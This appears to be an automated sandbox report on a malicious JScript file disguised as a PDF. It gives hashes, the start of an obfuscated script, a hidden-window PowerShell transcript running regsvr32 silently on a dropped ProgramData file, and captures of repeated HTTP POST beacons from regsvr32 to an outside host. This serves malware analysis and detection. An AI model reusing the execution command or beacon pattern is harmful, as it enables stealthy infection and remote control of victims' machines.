Preview:	.********************..Windows PowerShell transcript start..Start time: 20210825105849..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a..Process ID: 4168..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210825105849..******************..PS>regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a..******************..Command start time: 20210825105850..******************..PS>$global:?..True..********************..Windows PowerShell transcript end..End time:

Static File Info

General
File type:	ASCII text, with very long lines, with no line terminators
Entropy (8bit):	5.984829221055381
TrID:
File name:	x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse
File size:	28634023
MD5:	8b274243a5179028388a2c17c75afb9f
SHA1:	d5c09a6fff4dee7dee7f302c1d4d586ba6bc83f2
SHA256:	20eff877aeff0afaa8a5d29fe272bdd61e49779b9e308c4a202ad868a901a5cd
SHA512:	6848fe1763e2ec535b05374687cce02eeca59de0de21cbf1501defbb100ebe2bfaca68f6f75f4d34b8dbf1cda776b077096f550ca85a97586e311ab66e56e2af
SSDEEP:	49152:i0ivhMr3KWDux3B2PfsN7B0eP3GBxGwJzMvY+DHEAh7BeE3bt3FK6/Zas9gthH/t:X
File Content Preview:	try { d6rdVIu1CNC = "JVBERi0xLjQKJcO+CjEgMCBvYmo8PC9QYWdlcyA4NSAwIFIgL091dGxpbmVzIDE3IDAgUiAvVHlwZSAvQ2F0YWxvZz4+CmVuZG9iagoyIDAgb2JqCjw8L1R5cGUvRm9udCAvU3VidHlwZS9UeXBlMCAvQmFzZUZvbnQvtbi/8sO8LEJvbGQgL0VuY29kaW5nIC9LU0MtRVVDLUggL0Rlc2NlbmRhbnRGb250c1szID

File Icon


Icon Hash:	e8d69ece968a9ec4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 25, 2021 10:59:24.995543003 CEST	49701	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:24.995582104 CEST	49700	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:25.485392094 CEST	80	49700	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:25.485420942 CEST	80	49701	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:25.485584974 CEST	49700	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:25.485640049 CEST	49701	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:25.488600016 CEST	49700	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:25.488651991 CEST	49701	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:26.413067102 CEST	49701	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:26.489414930 CEST	80	49700	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:26.489447117 CEST	80	49701	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:27.508347034 CEST	80	49701	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:29.520359039 CEST	49701	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:29.520620108 CEST	49700	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:29.523055077 CEST	49704	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:29.528902054 CEST	49705	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:30.565032959 CEST	80	49704	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:30.565089941 CEST	80	49705	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:30.565445900 CEST	49704	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:30.565507889 CEST	49705	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:30.572340012 CEST	49704	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:30.574069023 CEST	49705	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:31.581434965 CEST	80	49705	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:31.581552029 CEST	80	49704	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:33.537187099 CEST	49704	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:33.537286043 CEST	49705	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:33.556792021 CEST	49706	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:33.556942940 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:34.639801025 CEST	80	49706	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:34.639833927 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:34.639992952 CEST	49706	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:34.640032053 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:34.642611980 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:34.642957926 CEST	49706	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:34.643527985 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:35.661135912 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:35.661164045 CEST	80	49706	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:35.661226988 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:35.661252022 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:35.661269903 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:35.661277056 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:35.661288023 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:35.661304951 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:35.661322117 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:35.661339998 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:35.661356926 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:35.661392927 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:35.661452055 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:35.661602974 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:36.681767941 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.681782961 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.681806087 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.681838036 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.681869030 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.681891918 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.681926012 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.681931973 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.681941032 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.681967974 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.681978941 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:36.681998014 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.682029963 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.682043076 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.682063103 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.682080030 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.682091951 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.682104111 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.682116032 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.682128906 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:36.682291031 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:37.702325106 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702358961 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702375889 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702392101 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702409029 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702424049 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702440977 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702455997 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702472925 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702486038 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702501059 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702500105 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:37.702513933 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702528954 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702544928 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702558994 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702574015 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702589035 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702605963 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702622890 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702640057 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702645063 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:37.702655077 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702672005 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702689886 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702707052 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702722073 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702739954 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702784061 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702801943 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702819109 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702835083 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702851057 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702864885 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702881098 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702897072 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702912092 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702927113 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702943087 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:37.702955961 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.635447979 CEST	49706	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.635652065 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.724632978 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.724666119 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.724678040 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.724688053 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.724699020 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.724710941 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.724723101 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.724735022 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.724775076 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.724791050 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.724870920 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.724900961 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.724909067 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.724915981 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.724922895 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.724927902 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.724930048 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.724937916 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.724941969 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.724950075 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.724953890 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.725025892 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.725048065 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.725066900 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.725080013 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.725091934 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.725136995 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.725151062 CEST	80	49707	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:38.725153923 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.725169897 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.725178957 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.725186110 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.725195885 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.725203991 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.725212097 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.725219011 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.725224972 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.725231886 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.725662947 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:38.725672960 CEST	49707	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:46.890233994 CEST	49709	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:46.890754938 CEST	49708	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:47.896063089 CEST	80	49708	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:47.896146059 CEST	80	49709	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:47.896317959 CEST	49708	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:47.896436930 CEST	49709	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:47.898830891 CEST	49708	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:47.899632931 CEST	49709	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:48.920011044 CEST	80	49708	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:48.920100927 CEST	80	49709	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:50.886939049 CEST	49708	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:50.886996031 CEST	49709	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:50.890595913 CEST	49710	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:50.891681910 CEST	49711	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:51.977365971 CEST	80	49710	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:51.977391958 CEST	80	49711	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:51.977564096 CEST	49710	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:51.977603912 CEST	49711	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:53.001545906 CEST	49710	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:53.001627922 CEST	49711	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:54.015885115 CEST	80	49710	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:54.015922070 CEST	80	49711	50.17.5.224	192.168.1.103
Aug 25, 2021 10:59:56.983951092 CEST	49710	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:56.984018087 CEST	49711	80	192.168.1.103	50.17.5.224
Aug 25, 2021 10:59:59.567550898 CEST	49712	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:00.153429031 CEST	80	49712	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:00.153877974 CEST	49712	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:02.255054951 CEST	49713	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:02.361629009 CEST	49712	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:03.210583925 CEST	80	49713	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:03.210972071 CEST	49713	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:03.214108944 CEST	80	49712	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:04.199266911 CEST	49713	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:04.640214920 CEST	49712	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:04.640270948 CEST	49713	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:05.159560919 CEST	49714	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:05.160320044 CEST	49715	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:05.251550913 CEST	80	49713	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:05.251750946 CEST	49713	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:06.270332098 CEST	80	49714	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:06.270401001 CEST	80	49715	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:06.270581961 CEST	49714	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:06.270631075 CEST	49715	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:06.274193048 CEST	49714	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:06.274682999 CEST	49715	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:07.286349058 CEST	80	49714	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:07.286377907 CEST	80	49715	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:10.282649994 CEST	49714	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:10.282713890 CEST	49715	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:10.287846088 CEST	49716	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:10.291549921 CEST	49717	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:11.379347086 CEST	80	49716	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:11.379393101 CEST	80	49717	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:11.379652977 CEST	49716	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:11.379710913 CEST	49717	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:11.381393909 CEST	49716	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:11.381963015 CEST	49717	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:12.400235891 CEST	80	49717	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:12.400268078 CEST	80	49716	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:14.320501089 CEST	49716	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:14.320796013 CEST	49717	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:14.325417042 CEST	49718	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:14.327869892 CEST	49719	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:15.463325024 CEST	80	49719	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:15.463360071 CEST	80	49718	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:15.463803053 CEST	49719	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:15.463856936 CEST	49718	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:15.465219021 CEST	49719	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:15.465665102 CEST	49718	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:16.485071898 CEST	80	49719	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:16.485090971 CEST	80	49718	50.17.5.224	192.168.1.103
Aug 25, 2021 11:00:19.466814041 CEST	49719	80	192.168.1.103	50.17.5.224
Aug 25, 2021 11:00:19.466906071 CEST	49718	80	192.168.1.103	50.17.5.224

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 25, 2021 10:58:42.886847973 CEST	53283	53	192.168.1.103	8.8.8.8
Aug 25, 2021 10:58:42.900681973 CEST	56350	53	192.168.1.103	8.8.8.8
Aug 25, 2021 10:58:42.922656059 CEST	53	53283	8.8.8.8	192.168.1.103
Aug 25, 2021 10:58:42.935491085 CEST	53	56350	8.8.8.8	192.168.1.103
Aug 25, 2021 10:58:43.918929100 CEST	56350	53	192.168.1.103	8.8.8.8
Aug 25, 2021 10:58:43.919034004 CEST	53283	53	192.168.1.103	8.8.8.8
Aug 25, 2021 10:58:43.953783989 CEST	53	56350	8.8.8.8	192.168.1.103
Aug 25, 2021 10:58:43.958594084 CEST	53	53283	8.8.8.8	192.168.1.103
Aug 25, 2021 10:58:44.921052933 CEST	53283	53	192.168.1.103	8.8.8.8
Aug 25, 2021 10:58:44.921231985 CEST	56350	53	192.168.1.103	8.8.8.8
Aug 25, 2021 10:58:44.953270912 CEST	53	53283	8.8.8.8	192.168.1.103
Aug 25, 2021 10:58:44.954113960 CEST	53	56350	8.8.8.8	192.168.1.103
Aug 25, 2021 10:58:46.958601952 CEST	56350	53	192.168.1.103	8.8.8.8
Aug 25, 2021 10:58:46.958714008 CEST	53283	53	192.168.1.103	8.8.8.8
Aug 25, 2021 10:58:46.984656096 CEST	53	56350	8.8.8.8	192.168.1.103
Aug 25, 2021 10:58:46.990740061 CEST	53	53283	8.8.8.8	192.168.1.103
Aug 25, 2021 10:58:49.492527962 CEST	64030	53	192.168.1.103	8.8.8.8
Aug 25, 2021 10:58:49.525954008 CEST	53	64030	8.8.8.8	192.168.1.103
Aug 25, 2021 10:58:50.971241951 CEST	53283	53	192.168.1.103	8.8.8.8
Aug 25, 2021 10:58:50.971344948 CEST	56350	53	192.168.1.103	8.8.8.8
Aug 25, 2021 10:58:51.003259897 CEST	53	53283	8.8.8.8	192.168.1.103
Aug 25, 2021 10:58:51.004323959 CEST	53	56350	8.8.8.8	192.168.1.103
Aug 25, 2021 10:59:24.717525005 CEST	60685	53	192.168.1.103	8.8.8.8
Aug 25, 2021 10:59:24.932656050 CEST	53	60685	8.8.8.8	192.168.1.103
Aug 25, 2021 10:59:27.738946915 CEST	52295	53	192.168.1.103	8.8.8.8
Aug 25, 2021 10:59:27.772903919 CEST	53	52295	8.8.8.8	192.168.1.103

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 25, 2021 10:59:24.717525005 CEST	192.168.1.103	8.8.8.8	0xfd73	Standard query (0)	texts.letterpaper.press	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 25, 2021 10:59:24.932656050 CEST	8.8.8.8	192.168.1.103	0xfd73	No error (0)	texts.letterpaper.press		50.17.5.224	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

texts.letterpaper.press

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.103	49700	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 10:59:25.488600016 CEST	5	OUT	POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.1.103	49701	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 10:59:25.488651991 CEST	5	OUT	POST //?m=c&p1=8ace1190 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache
Aug 25, 2021 10:59:26.413067102 CEST	5	OUT	POST //?m=c&p1=8ace1190 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.1.103	49712	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 11:00:02.361629009 CEST	72	OUT	POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.1.103	49713	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 11:00:04.199266911 CEST	73	OUT	POST //?m=c&p1=8ace1190 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.1.103	49714	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 11:00:06.274193048 CEST	74	OUT	POST //?m=c&p1=8ace1190 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.1.103	49715	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 11:00:06.274682999 CEST	74	OUT	POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.1.103	49716	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 25, 2021 11:00:11.381393909 CEST	75	OUT	POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: texts.letterpaper.press Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.1.103	49717	50.17.5.224	80	C:\Windows\System32\regsvr32.exe

